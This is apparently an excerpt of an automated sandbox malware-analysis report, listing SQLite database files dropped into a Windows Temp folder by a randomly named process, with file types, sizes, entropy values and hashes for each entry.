                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\LnLmJl02gq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\LzzmkjbuK6

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\M1t8BWajUC

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\M3hHhkX0kP

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\M8cAKkVKFV

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MG4QuZwfXK

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MVLDT46Fmj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MXqrl4I1Rh

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MZ92soRIH5

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MhaGGvpO5O

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MhiNHsJ5hh

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\N32hkEPmDF

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\N70iKQLrq5

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\NA30Ex2GuE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\NKLwfkXqh9

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\NVW8Y6uZmo

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\O5h0u0VeAu

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OLvGr5XHUB

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OODIJcuEqX

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OTUBuJ5uUR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OXnaIwaap4

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OYhv9v4nv7

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
